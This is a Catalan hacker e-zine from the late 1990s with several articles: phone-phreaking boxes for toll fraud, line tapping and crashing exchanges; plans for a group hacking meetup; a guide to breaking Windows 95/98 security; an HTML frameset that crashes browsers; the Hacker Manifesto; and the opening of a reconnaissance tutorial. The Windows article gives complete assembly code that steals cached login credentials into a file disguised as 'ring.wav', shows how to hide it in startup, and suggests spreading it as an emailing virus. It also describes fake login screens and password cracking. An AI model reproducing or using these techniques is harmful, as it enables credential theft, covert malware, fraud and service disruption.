en un casset. I un cop possat trucar des d'una cabina a casa.
2) Per donar aquest so a la cabina de forma disimulada podem fer-ho
aixi: agafem el walkman i posem el volum al maxim, llavors
disimulant una mica ens possem un dels dos auriculars a la
boca, enfocant cap al microfon i premer <play>.
NOTA: Si, d'acord, sembla molt de pel.licula (hackers xD) i tambe
diuen que ho podem utilitzar desde casa, pero... no ho sabrem mai
si no ho probem. -Us ho deixo a les vostres manS-
NOTA2: Certament no he probat aquest to, pero ho he porbat amb els
tons normals (1234567890*#) i no funcionen, sembla que fins que no
s'estableix la conexio el microfon queda desconectat. En les cabines
blaves, potser en les verdes antigues si que podrem. -try it!-
CLEAR BOX: Aquesta 'caixa' nomes la podrem utilitzar als eeuu i als altres
paissos on hi hagin els "post pay phones", unes cabines que ens cobren
despres d'establir la trucada (cosa impensable per la (T), mamons!)
Es bastant descarat, pero no hi ha un altre forma de fer-ho, tracta
de possar un telefon "modificat" a la roseta RJ de la cabina.
Aquest telefon, l'hem de portar de casa i ha de tenir un amplificador
que augmenti la senyal en 5 vegades, d'aquesta forma es podra parlar
a un volum normal i sense pagar ni un...dolar $-)
<POPNOTE> A eXpanya si que hi han de cabines pospay, estan normalment
en les benzineres o els bars, son aquelles de la pantalla LCD tant gran
i que porten la caixa de les peles a sota (acostumen a ser verdes).
COLOR BOX:Aquesta caixa funciona a qualsevol pais.Es tracta en punxar la linea
d'algu i possar la box junt amb una grabadora que anira grabant sempre
que algu despenji el telefon, llavors podrem escoltar els telefons
que marquen, les conversacions i si per alguna casualitat hi ha un
modem a l'altre costat, podrem intentar desxifrar el password i el
login que introdueixen per conectar-se. ;)
COPPER BOX: Aquesta box, es destructiva (menys que la blotto) i mes intel.li-
gent, pero tambe rebenta centraletes. Tracta en buscar un telefon
MCI o SPRINT (dels que despres de marcarlos en donen to) i anar
marcant tota l'estona el mateix numero MCI, creant aixi un loop cada
cop mes gran.
-exemple-
> MCI - MCI - MCI - MCI - MCI - MCI - ... -
^.____| | | | | |
|.__________| | | | |
|.________________| | | |
|.______________________| | .
|.____________________________| .
Quan ens cansem, deixem el telefon despenjat uns 10 minuts (que vagi
escalfant la maquina jeje) i despres, penjem i tornem a repetir el
proces. Al final, quan no ens doni to al marcar aquell numero haurem
aconesguit matar aquella centraleta. Suposo que la copper box es
podria fer amb la blue box, enrutant telefons, pero no ho he probat.
CRIMSON BOX: La crimson box, es una forma de fer un <mute> si home si, allo
tant util per desfogar-nos d'una persona sense que ens senti. La seva
creacio es facil, nomes ens caldra un cutex(r), una resistencia de
100ohms un switch de 2 possicions (3 potes) i un soldador. L'esquema
es facil:
FM -------. .--R(100ohm)----x----FM
.-|-' .-------------'
| | |
.-1--2--3-.
on |_________| off
FM = fil modular (+)
R(100ohm) = Resistencia de 100ohms
1-2-3 = Switch de 2 possicions posibles: 1+2 (on) i 2+3 (off)
x = Es l'unic punt de l'esquema en que dos fils es creuen.
-=> FI <=-
Ja hem acabat la lliso de boxes per aquest numero. Espero que us hagi agradat,
si teniu dubtes, propostes, etc... podeu contactar amb mi desde la direccio:
poptph@hotmail.com. En el proxim numero de la revista intentare parlar-vos de
mes caixes.
Anarchy trhu the fone lines! -The Traveler (de 2600)-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[04]
_/_/_/_/_/_/_/_/_/_/ 1a Trobada Cathack _/_/_/_/_/_/_/_/_/_/_/_/_/_/
_/_/_/_/_/_/_/_/_/ _/_/_/_/_/_/_/_/_/_/_/_/_/
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Bones bpaires!
Això pretent ser una mena de guia per la trobada que farem tots els membres
de cathack. No parlo de una trobada per parlar i tal.. sino una trobada amb
ganes d'aprendre i on fem moltes coses, que recollirem al llarg d'aquest text.
Aqui podriem recopilar totes les idees sobre el que farem quan quedem, on
anirem, etc. D'aquesta manera ho tindrem tot molt ben organitzat en cada
moment. Ens falta una mica d'ordre, i per això el que pretenc fer amb aquest
txt és posar-ne una mica però en l'aspecte de la trobada, es clar.
Aquesta trobada naturalment serà amb ordinadors, els quals seran conectats
amb xarxa. Per això és necessari que tothom tingui una tarjeta de red. Son
barates, una Ethernet 10/100 Pci per exemple val 2500, mes o menys.
Primer de tot ens faltaria un lloc! algú té algun lloc on es puguin posar
com 8 ordinadors mes o menys?
Val! i un cop que tenim els ordinadors i tot conectat amb xarxa, que? Doncs
això és el que hem de pensar. Fer algo positiu! algo on tots aprenguem.
Jo he pensat algo que podriem fer.
Hacking :
^^^^^^^
Tipus de hackeig que podriem fer:
- Remotament (es a dir.. sense tenir acces al servidor. Ni cap usuari ni
res..) Podriem hackejar-nos (o si mes no, intentar-ho) a nosaltres mateixos.
Amb el nostre linux el fem de servidor i ens intentem hackejar. Aquest tipus
de hackeig serà el mes difícil. PErò si mes no.. hem d'intentar fer algo.
Encara que no ho hackejem doncs podriem fer algun D.o.S , per exemple.
- Un l'altre tipu de hackeig serà el local:
Es a dir.. que ho intentarem hackejar tenint una conta dintre del servidor.
- I l'altre tipu de hackeig que podriem fer és hackejar-ho com a usuari root.
Es a dir, que nosaltres seriem el root i l'únic que tindriem que fer és
instal.lar una backdoor (si es vol) , borrar les petjades, etc..
Com que els hackejos no es fan en un sol dia ni es preparen en un sol dia,
el que podriem fer és que com que cadascú tindrà el seu servidor.. doncs
quedar un dia al irc conectats amb linux) i anar començant a investigar els
servidors dels altres membres de CatHack. Llavors deixariem uns dies per
investigar , buscar xploits, etc. I anar preparant el hackeig. Fins que
arribarà el dia de la trobada i allà serà on ho posarem en practica, provant
els xploits, mirant noves coses, etc...
Una altre cosa que podriem fer és aprendre a ser admin:
I com ho fariem? doncs jo he pensat en el seguent "joc" . Un té un paper
amb tots els logins i pass de cada ordinador. Llavors tria un i intenta
accedir-hi. Tots els altres membres de CatHack estan davant l'ordinador o
passejant.. Com vulguin!!! però que no mirin el "hacker".
Despres quan ja ha acabat el hackeig doncs tots els altres membres. (els
admins) Miraran al seu servidor si ha penetrat algú. I ho farà mirant els
logs, lastlog, wtmp, etc.. I mirarà si ha instalat una backdoor, ha posat
alguna rootkit, etc.. I si l'admin ho descobreix que ha entrat doncs ell
perd. jaja!
La gràcia d'això és que tots miren a veure si ha entrat però només ha entrat
a un ordinador, sabeu?
Si el "hacker" doncs ho fa molt bé! doncs podriem fer-ho tb de la forma que
l'admin sabes amb seguretat que ha entrar al seu server i així s'hi mataria
mes buscant i mirant per els logs i tal, sabeu?
Tant els admins com els hackers doncs seria recomenable que utilitzessin
eines per analitzar el servidor de possibles fallos, detectors de rootkits,
etc. Us recomano el Nessus. (Network security Scanner) o el Saint , Satan,
etc..
També dintre de la part de hacking podriem provar troians que haguem fet
(com per exemple el del Quickshot o un meu que estic fent ara per linux. Molt
semblant al seu però ho fa de diferent manera...
Bueno doncs això és el que havia pensat principialment sobre temes de hacking!
Aquest txt queda obert a noves propostes. Si algu se li acudeixen noves
coses que ho envii a la llista. Però repeteixo... el que es molt i molt
important és la organització!!
Organitza't, Hackeja i Lluita!!
<.·BaRner·.>
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[05]
HACKEJAR WINDOWS 95/98 AMB ACCÉS FÍSIC A LA MÀQUINA
per Àlex Castán Salinas
alex.castan@upc.es
A aquest article intento explicar com saltar-se la seguretat d'un PC amb
sistema operatiu Windows 95/98, quan físicament tenim accés a la màquina en
qüestió. Si coneixeu més tècniques que les que explicaré, i voleu fer
aportacions, preguntes o qualsevol comentari a l'article, envieu-les a
l'adreça de correu que apareix a dalt i us ho agrairé molt.
Primer de tot cal concretar què vol dir 'hackejar'. Les tècniques que fem
servir per saltar-nos la seguretat d'un sistema són diferents en funció del
que volem aconseguir. No fem el mateix quan volem provocar un atac de
denegació de servei i fer caure el sistema, que quan volem la contrasenya
(password) d'un altre usuari, que quan volem un fitxer al qual no tenim accés
(per exemple un examen), que quan volem aconseguir privilegis d'administrador.
En el nostre cas suposem una xarxa d'ordinadors amb diferents sistemes
operatius: SunOs, Solaris, Linux, MacOs, Windows NT, Windows 95/98, etc.
Imaginem que el que volem és aconseguir les contrasenyes de diferents usuaris.
Per això atacarem el sistema en el seu punt més feble: les màquines amb
sistema operatiu Windows 95/98.
(1) ENTRANT SENSE PERMÍS:
Quan intenteu accedir a la màquina amb Windows 95/98 us apareixerà una
pantalla on us demanarà el nom d'usuari i contrasenya. Per tirar endavant i
accedir a l'escriptori de Windows podeu realitzar diferents accions:
- Posar, si en teniu, el vostre nom d'usuari i contrasenya. Podreu accedir a
l'escriptori i a la xarxa.
- Prémer el botó 'Cancel·lar'. També accedireu a l'escriptori però no a la
xarxa.
- Quan s'inicia Windows prémer la tecla F5 i iniciareu Windows 'a prova
d'errors'. No us demanarà el nom d'usuari i la clau, però no tindreu accés a
la xarxa.
- Arrencar en mode MS-DOS i renombrar els fitxers de la carpeta 'Windows' amb
extensió .pwl a una altre extensió.
(2) FITXERS DE CONTRASENYES:
A Windows 95/98 les contrasenyes dels usuaris es guarden a la carpeta
'Windows', als fitxers amb el mateix nom que el nom de l'usuari i amb
l'extensió .pwl . És a dir, que si al meu nom d'usuari és acastan, a la
carpeta Windows hi ha un fitxer anomenat acastan.pwl que conté la meva
contrasenya. Aquesta contrasenya està codificada i si obriu el fitxer
acastan.pwl o qualsevol altre amb un editor de text, no l'aconseguireu trobar.
Per aconseguir la contrasenya d'un determinat usuari copieu-vos el seu fitxer
de contrasenya a un disquet i, un cop a casa, utilitzeu un programa especial
per trobar la seva contrasenya. Per exemple, teniu el programa 'pwlhack', que
trobareu a l'adreça d'Internet 'http://neworder.box.sk' a l'apartat '#MS
Windows 95/NT security' al subapartat '#Windows password crackers'. Aquest
programa provarà totes les claus possibles fins a donar amb la correcta.
Aquest mètode de provar totes les claus possibles s'anomena 'atac de força
bruta' i és una mica lent. Segurament necessitareu deixar treballant durant
hores o dies un ordinador ràpid fins donar amb la clau. Existeix un altre
mètode que només prova determinades paraules i s'anomena 'atac de diccionari'.
Molts usuaris utilitzen com a contrasenya noms d'equips de futbol, noms
d'objectes o, fins i tot, el mateix nom d'usuari !
(3) KEYLOGGERS, ASTERISK VIEWER I FALSA PORTA D'ENTRADA:
Un keylogger, també anomenat keytrapper i key sniffer, és un programa que un
cop instal·lat es dedica a guardar en un fitxer totes les tecles premudes per
l'usuari. Després podem consultar el fitxer per buscar entre el text escrit el
nom d'usuari i la contrasenya (login i password). És important, per un
programa d'aquest tipus, que passi desapercebut, és a dir, que no tinguem una
icona a la barra de tasques, etc.
Un asterisk viewer, com el seu propi nom indica, és un programa que un cop
instal·lat ens permet veure que hi ha darrere dels asteriscs. Com sabeu,
moltes finestres ens amaguen les contrasenyes escrivint asteriscs enlloc dels
caràcters corresponents. Si executem un asterisk viewer, quan premem una
combinació de tecles determinada, podrem veure que s'amaga darrere els
asteriscs.
Una falsa porta d'entrada és un programa que imita la pantalla on l'usuari
introdueix el seu nom i la seva contrasenya per accedir al sistema. Ha estat
un mètode molt utilitzat en tots els sistemes operatius per caçar
contrasenyes. Imagineu que creeu un programa que quan l'executeu dins una
sessió vostre (o d'algun altre de qui ja tingueu la contrasenya) obre un a
finestreta idèntica a la del sistema operatiu per demanar el nom d'usuari i la
contrasenya, fent creure a un nou usuari que no hi ha cap sessió oberta en
aquell moment, guarda les dades que aquest nou usuari introdueix en un fitxer
que només vosaltres coneixeu, tanca la sessió que hi havia oberta, i comunica
a l'usuari que ha hagut un error del sistema o que la contrasenya era
incorrecta. S'acaba l'execució del programa i l'usuari introdueix per segon
cop les dades per iniciar la seva sessió. Si l'usuari és ingenu no té per què
sospitar res.
Podeu trobar keyloggers i asterisk viewers per Windows a l'adreça d'Internet
'http://neworder.box.sk' a l'apartat '#Utilities' al subapartat '#Keyloggers'.
Personalment jo no els he provat, així que ja hem direu que tal funcionen.
(4) EXPLOITS:
Exploits, explicat d'una manera molt barroera, són debilitats o
vulnerabilitats de programes instal·lats al sistema operatiu que comprometen
la seguretat del sistema. Per posar un exemple: a Windows hi han programes en
que l'usuari ha d'introduir contrasenya i on la contrasenya queda guardada a
un fitxer en text planer, sense codificar! Podeu fer una prova per veure si
passa això a la vostre màquina fent servir l'eina de Windows 'inicio -> cercar
-> arxius o carpetes -> amb el text' i poseu la vostre contrasenya. Si trobeu
algun arxiu, segurament contindrà la contrasenya de més usuaris.
Trobareu llistes d'exploits, endreçades per sistema operatiu, programa i
versió, a les següents adreces d'Internet: www.cert.org , www.rediris.es/cert,
www.genocide2600.com/~tattooman/index.shtml, www.infilsec.com/vulnerabilities,
www.rootshell.com, www.iss.net/xforce, www.anticode.com, www.inseguridad.org.
(5) RECURSOS COMPARTITS:
Tenir ordinadors connectats en xarxa ens permet compartir els seus recursos:
discos durs, carpetes, impressores, etc. A alguns d'aquests recursos interessa
que tinguin accés només uns quants usuaris (de vegades només l'administrador)
i, per aconseguir-ho a Windows, s'utilitzen contrasenyes per poder accedir.
Aquesta contrasenya queda guardada en el registre de Windows codificada, però
amb un petit programa que trobareu a Internet la podeu decodificar.
Per obtenir les contrasenyes codificades només cal editar el registre amb el
programa regedit.exe de Windows i cercar els recursos compartits a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan.
Per a cada recurs compartit de la màquina, al es seves dades hi ha dues
entrades del registre, Parm1enc i Parm2enc. Parm1enc és la contrasenya d'accés
total i Parm2enc la contrasenya de només lectura.
Per obtenir el programa que decodifica les contrasenyes cerqueu a Internet
'sharepw.c' i/o 'sharepw.exe'. Els trobareu, per exemple, a www.rootshell.com,
si cerqueu el text sharepw .
A mi em va servir per trobar la contrasenya d'un administrador :-)
(6) INTERRUPCIONS:
La seguretat en Windows 95/98 és tan penosa que, un cop iniciada una sessió
podeu, si sabeu programar una mica en ensamblador, cridar una interrupció de
MS-DOS (int 2fh 'multiplex') que us permetrà obtenir el nom d'usuari i
contrasenya, encara guardades a la memòria caché. Aquestes crides són:
+---------------------+-----------------------+----------------------------+
| grup de treball | nom d'usuari | contrasenya |
+---------------------+-----------------------+----------------------------+
| mov di, offset grup | mov di, offset usuari | mov di, offset contrasenya |
| mov bl, 05h | mov bl, 03h | mov bl, 0eh |
| mov ax, 1184h | mov ax, 1184h | mov cx, 0fh |
| int 2fh | int 2fh | mov ax, 1184h |
| | | int 2fh |
+---------------------+-----------------------+----------------------------+
Un exemple de programa complet seria:
Tallar per aquí 8<-------------------------------------------------------
DOS equ 21h ; interrupció DOS
MPLX equ 2fh ; Interrupció multiplex
cseg segment para public 'CODE'
assume cs:cseg, ds:cseg, es:cseg, ss:cseg
org 100h
cache proc far
Obrir_Fitxer:
mov di, offset nom_fitxer
mov dx, di
mov cx, 8
mov al, 01h ; mode escriptura
mov ah, 3dh ; obrir fitxer
int DOS
jc Crear_Fitxer ; comprova si existeix
mov handle, ax
mov bx, handle
mov cx, 0h ; desplaçament 0
mov dx, 0h ; desplaçament 0
mov al, 02h ; final de fitxer
mov ah, 42h ; posicionar dins del fitxer
int DOS
jmp Grup_Treball
Crear_Fitxer:
mov cx, 0h ; atribut normal
mov ah, 3ch ; crear fitxer
int DOS
jc Fi_Programa ; comprova si pot crear-lo
mov handle, ax
Grup_Treball:
mov bl, 05h
mov di, offset ans_workgroup
call Obte_Info
mov di, offset str_workgroup
mov dx, di
mov cx, 64+12
call Escriu_Str
Login:
mov bl, 03h
mov di, offset ans_login
call Obte_Info
mov di, offset str_login
mov dx, di
mov cx, 64+12
call Escriu_Str
Password:
mov bl, 0eh
mov di, offset ans_password
call Obte_Info
mov di, offset str_password
mov dx, di
mov cx, 64+12
call Escriu_Str
Tancar_Fitxer:
mov bx, handle
mov ah, 3eh ; tancar fitxer
int DOS
Fi_Programa:
mov ax,4C00h ; finalitzar programa
int DOS
cache endp
Obte_Info: ; buscar a la caché
mov ax, 1184h
mov cx, 0fh ; Només cal per bl=0eh
int MPLX
ret
Escriu_Str: ; escriure al fitxer
mov bx, handle
mov cx, 12+64+2
mov ah, 40h
int DOS
ret
nom_fitxer db 'ring.wav', 0
handle dw 0
str_workgroup db 'workgroup : '
ans_workgroup db 64 dup(32)
end_workgroup db 0dh,0ah
str_login db 'login : '
ans_login db 64 dup(32)
end_login db 0dh,0ah
str_password db 'password : '
ans_password db 64 dup(32)
end_password db 0dh,0ah
cseg ends
end cache
Tallar per aquí 8<-------------------------------------------------------
Aquest codi el podeu compilar amb qualsevol ensamblador (a Internet trobareu
un gratuït del projecte GNU anomenat nasm) i obtindreu un petit programa
MS-DOS (menys de 400 bytes) que al executar-lo guardarà el nom d'usuari i la
seva contrasenya en text planer a un fitxer anomenat 'ring.wav'. Potser que,
de vegades, enlloc de guardar el nom d'usuari guardi el nom de xarxa de la
màquina. En aquest cas haureu de agafar els fitxers .pwl i les contrasenyes
obtingudes i emprar un atac de diccionari amb 'pwlhack' (veure punt 2
anterior).
Molt bé. Què podem fer amb aquest programa? Podem fer que s'executi
automàticament quan algú inici la seva sessió, obtenint per lo tant la seva
contrasenya. Nosaltres passem un cop a la setmana o al mes per recollir el
fitxer de contrasenyes 'ring.wav' i ja està. Per fer que un programa s'executi
en iniciar la sessió tenim vàries opcions:
- Posar un accés directe a 'Inici -> Programes -> Inici'. Com que apareixeran
el nom i la seva icona, per que no es noti li podem posar el nom i la icona
d'algun programa que passi desapercebut. Per exemple, traiem l'accés directe
de 'Búsqueda rápida de Microsoft' o 'Inicio d'Office' i posem el nostre, amb
el mateix nom i icona XD. És fàcil de fer, només cal tenir una mica de
pràctica amb el Guindows.
- Indicar al registre de Windows que s'executi en iniciar la sessió. Encara
passarà més desapercebut. Executem 'regedit.exe' i afegim a
'HKEY_LOCAL_MACHINE -> Software -> Microsoft -> Windows -> CurrentVersion ->
Run' una línia amb el nom del nostre programa.
- Etc. (hi han infinitat de mètodes).
Problemes:
En ser un programa per MS-DOS, encara que a les seves propietats indiqueu que
s'executi amb finestra minimitzada, jo no he aconseguit fer desaparèixer la
seva icona de la barra de tasques per tal que no es vegi. Algú sap com fer-ho?
Solucions:
Desensamblar el codi d'algun dels programes que s'executen en iniciar la
sessió, afegir el codi ensamblador del nostre programa i tornar a ensamblar
(sí, com si es tractés de la infecció d'un virus). Encara passarà més
desapercebut, però aquest mètode requereix més perícia.
Feina a fer:
Aquest programa és senzill de modificar. Es pot mirar d'afegir codi per tal de
fer un virus que aconsegueixi el nom d'usuari, contrasenya i adreça IP de la
màquina, i enviï aquesta informació encriptada a una determinada adreça de
correu electrònic.
(7) SNIFFERS:
Imagineu que heu entrat a una màquina amb nom d'usuari i contrasenya. Estareu,
per lo tant, connectats a la xarxa. Dins d'una xarxa d'ordinadors, normalment
quan un ordinador envia un missatge a un altre indica dins el missatge quin
ordinador l'envia i a quin ordinador va dirigit aquest. Moltes targetes de
xarxa poden funcionar en un mode que s'anomena 'promiscu'. Això vol dir: el
vostre ordinador detecta que un missatge circula per la xarxa, l'agafa,
comprova si és per ell i, si és així se'l queda i, si no, doncs passa d'ell.
Bé, un sniffer és un programa que posa a treballar la tarja de xarxa de la
vostra màquina en mode promiscu, agafant la primera part dels missatges que
circulen per la xarxa i guardant-los al vostre ordinador. Molts dels missatges
que circulen per la xarxa contenen, a la seva primera part, nom d'usuari i
contrasenya (per exemple, missatges d'inici de sessió), i de vegades amb el
text en clar, sense codificar.
Podeu trobar sniffers per Windows a l'adreça d'Internet
'http://neworder.box.sk' a l'apartat '#MS Windows 95/NT security' al
subapartat '#Windows OS related tools'. Aneu amb compte perquè a una xarxa
poden tenir programes capaços de detectar si hi han ordinadors amb tarja de
xarxa funcionant en mode promiscu. Trobareu un detector de sniffers a l'adreça
d'Internet 'http://www.l0pht.com'.
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
[06]
[^^^^^^^^^^^^^^^^^^^^^^]
[ popLOOP bug ]
[ ]
[ by Pop.tPH ]
vvvvvvvvvvvvvvvvvvvvvv
Pels voltants del 98 un pop (o sigui jo) va descobrir un bug en les versions
3 dels navegadors explorer i netscape, afortunadament (o no) van solucionar
el problema en les següentes versions.
Pero anem per pams (i pims) pim pam:
El popLOOP feia obrir frames exponencialment fins que acabava penjant el
sistema, expliquem-ho gràficament:
[frame]...
/
[frame]
/ \
[frame] [frame]...
\
[frame]-[frame]...
\
[frame]...
De manera que cada cop el programa requeria més i més memoria per poder-lo
funcionar fins que poc a poc anava caient el sistema (i no es podia parar ja
que el seu funcionament era molt ràpid). Anaven sortint errors del pal:
Insuficiente memoria desea cerrar el programa: xxx.exe?
Aixi fins que el sistema es bloquejava i s'havia d'apagar amb el butonet.
Per poder fer aquest efecte, calia utilitzar un fitxer html que obris 2
frames i en cada frame obris el mateix fitxer. Si no ho teniu clar mireu
el cf de sota:
--------poploop.htm--------
<html>
<frameset cols="50,*" border="0">
<frame src="poploop.htm">
<frame src="poploop.htm">
</frameset>
</html>
---------poploop.htm-------
Aquestes simples linies conseguien fer aquest efecte, pero aixo la Netscape
ho va veure i van decidir fer que si es feien frames no es podia obrir el
mateix fitxers (despres ho va arreglar la microsoft). I no penseu que fent
el mateix pero amb més arxius funciona...no!, tb t'ho pillen aixi que ja no
funciona pero com a minim heu après algo i potser encara funciona a algu.
Siau
>POP
#############################################################################
._.·´^`·._.·´^`·._.·´^`·._.·´^`·._.·´^`·._.·´^`·._.·´^`·._.·´^`·._.·´^`·._.·´
#############################################################################
[07]
Manifest Hacker
El seguent document, esta essent reproduït en honor als phreakers i
hackers que han estat capturats recentment per el Servei Secret:
La consciencia d'un Hacker:
Un altre ha estat capturat avui, esta en tots els diaris.
"Adolescent arrestat en un escàndal per crims informàtics"
"Hacker arrestat després de traspassar les barreres de seguretat d'un banc"
Maleïts xavals. Tots són iguals.
Però tú, en la teva psicologia partida en tres y el teu tecnocervell del 1950,
alguna vegada has observat qué hi ha darrere els ulls d'un Hacker ?
Alguna vegada t'has preguntat qué coi el mou, quines forces l'han format i
quines el van poder transformar ?
Sóc un Hacker, entra en el meu món...
El meu món comença a l'escola...
Sóc més intel·ligent que la majoria dels altres xavals, aquesta porqueria que
ensenyen m'aborreix...
Maleïts subrealitzats. Tots són iguals.
Estic en un curs preuniversitari o al parvulari ? He sentit explicar als
professors per decimoquinta vegada com reduïr una fracció. Jo ho entenc.
"No, Srta Smith, no tinc els deures fets, els he fet al meu cap"
Maleït xaval. Ho deu haber copiat. Tots són iguals.
Avui he fet un descobriment. He trobat un ordinador. Espera un moment, això
mola ! Fa lo que jo li dic. Si comet un error, és perquè jo m'he equivocat,
No perque no li ha agradat...
O se sent amenaçada per mi..
O pensa que soc un cregut...
O no li agrada ensenyar y no tindria que estar aquí.
Maleït xaval. Només sap jugar. Tots són iguals.
I llavors va ocórrer...
Una porta oberta al món...
Corrent a través de les linees telefóniques com l'heroína a través de les
venes d'un drogadicte, s'envia un puls eléctric, un refugi per les
incompeténcies del dia a dia és buscat... Una taula es trobada.
"Aquest és...Aquest és el lloc on pertanyo"
Conec a tothom aquí...encara que no els conegui, encara que mai hagi parlat
amb ells, encara que no els torni a veure mai més...Els conec a tots...
Maleïts xavals. Enllaçant les linies telefóniques una altra vegada. Tots són
iguals.
Aposta't el cul que tots som iguals...
A nosaltres ens han estat donant papilles digerides per a bebé quan teniem
ganes de mejar carn. Els trocets de carn que a vosaltres se us han caigut
estaben mastegades i sense gust. Nosaltres hem estat dominats per sádics,
o ignorats per els apàtics.
Els pocs que tènen alguna cosa a ensenyar-nos són alumnes complaents, pero
aquests pocs són com gotes d'aigua en el desert.
Ara aquest és el nostre món...
El món de l'electro y el conmutador, la bellesa del baudi. Nosaltres fem ús
d'un servei que ja existeix i que podría estar tirat de preu si no estigués
en mans de avariciosos assedegats de més guanys, i vosaltres ens anomeneu
criminals. Nosaltres explorem... i vosaltres anomenen criminals. Busquem
darrere el coneixement... i vosaltres ens anomeneu criminals. Nosaltres
existim sense color de pell, sense nacionalitat, sense prejuicis religiosos...
i vosaltres ens anomeneu criminals. Vosaltres vàreu construir bombes
atómiques, vàreu fer la guerra, vàreu assassinar, vàreu enganyar i ens vàreu
mentir tractant de fer-nos creure que era per el nostre bé, i ara nosaltres
som els criminals.
Si, sóc un criminal. El meu crim es la curiositat. El meu crim es el jutjar a
les persones per el que diuen i pensen, no per les seves aparences. El meu
crim és ser més intel·ligent, una cosa que mai em perdonaràs. Sóc un Hacker i
aquest és el meu manifest. Tu em podrás arrestar a mi, però no podras arrestar
a tots... Després de tot, tots sóm iguals.
+++The Mentor+++
8-1-86
Traducció: Brainstorm.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Calamars.A.La.Romana.Amb.Pernil.Dolç.I.Butifarra.Carxofes.I.Una.Pizza.Peperoni
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[08]
******************************************************************************
********* /""'\
****** |(..) |
*** Collint Informació per Pop.tPH \() / <- Sr Pop
*** //|\\
****** // | \\
*********
******************************************************************************
Qui no s'ha parat mai a pensar en tota la informació que hem de recollir
abans de hackejar algun servidor? Intentaré fer-vos una petita idea resumint
la informació mes important que heu d'agafar.
IPs & Company:
~~~~~~~~~~~~~~
Per començar haurem d'escollir el servidor victima ;) posem el tipic exemple
de www.victima.com (que com algun dia algú monti alguna màquina amb aquest
nom es cagara en tot xDD) doncs primer haurem d'aconseguir la seva IP, com?
hi han moltes formes, la mes practica i facil es fer un ping:
> ping www.victima.com
Pinging www.victima.com [123.45.67.89] with 32 bytes of data:
Reply from 123.45.67.89: bytes=32 time=15ms TTL=32
Molt bé, ara ja tenim la seva IP, tambe podem fer-ho d'altres formes, amb el
mIRC (pexemple): /dns www.victima.com, o entrant al navegador i apuntar la
ip que surt abaix rapidament (bastant dificil).
NOTA: Una ip es una direccio de 32 bits utilitzada pel protocol tcp/ip.
(8 bits = 256 possibilitats) 255.255.255.255, comença a partir del 0, o
sigui, si multipliquem una mica ens dona 4.294.967.296 (suficientes de
moment per cobrir les necessitats actuals) i si no passarem a les de 40bits xD
Ara us preguntareu... de que ens serveix la ip? si tambe puc accedir per seu
nom? doncs facil, d'entrada sabreu a quina subxarxa pertany, a mes podreu
accedir de forma mes rapida al servidor (ja que no ha de resoldre el nom amb
la IP) - aixo també ho podeu solucionar amb el linux omplint el fitxer:
/etc/hosts. Doncs vinga, anem a escanejar la seva "subxarxa", agafem un
ipscaner (porter pexemple per w12) i li diem que ens escanegi totes les ip
del rang 123.45.67.1 fins al 123.45.67.254, i que passa amb 0 i 255? doncs
facil, el zero serveix per indicar qualsevol ip de dintre d'aquell rang i el
255 es la direccio broadcast (o sigui tota la xarxa) i per suposat no ens
respondra (serveix per l'us intern de la xarxa).
Normalment si feu aixo conseguireu les ip (i si teniu un bon ipscan el nom)
llavors sabreu totes les màquines que hi han en aquell nivell d'ip (les ip
es divideixen en nivells: 1nivell= 255.255.255.0, 2nivell=255.255.0.0, etc.
moltes xarxes acostumen a ser de 2n nivell i per tant no estaria de més
revisar els noms de màquina de la mateixa ip però d'un rang 2n més gran o
més petit.
_____________ _____________
| 123.45.67.0 |--------| 123.45.67.1 | ]|
|_____________| |_____________| ]| ( broadcast )
| _____________ ]|-- 123.45.67.255
|_____________| 123.45.67.8 | ]|
|_____________| ]|
figura1: esquema curtrisim del que seria la xarxa
Les ip de les màquines les agafen conforme es van adderint a una xarxa, i
son les mateixes cada cop que es desconecten i es tornen a conectar ( no son
dinàmiques ) -això en la majoria de ethernets, per tant, si fem un ipscan i
ens troba aquestes maquines:
.--( ip )---( nom de la maquina )---.
| 123.45.67.1 - router.victima.com |
| 123.45.67.8 - pop.victima.com |
| 123.45.67.23 - campistrula.victima.com |
`--------------------------------------------'
Aixo vol dir que dins de la xarxa sota el nivell 1 de www.victima.com nomes
trobem enceses 3 maquines, una d'elles es aparentment un router (els x.x.x.1
acostumen a ser routers, ja que son la primera màquina que es monta en una
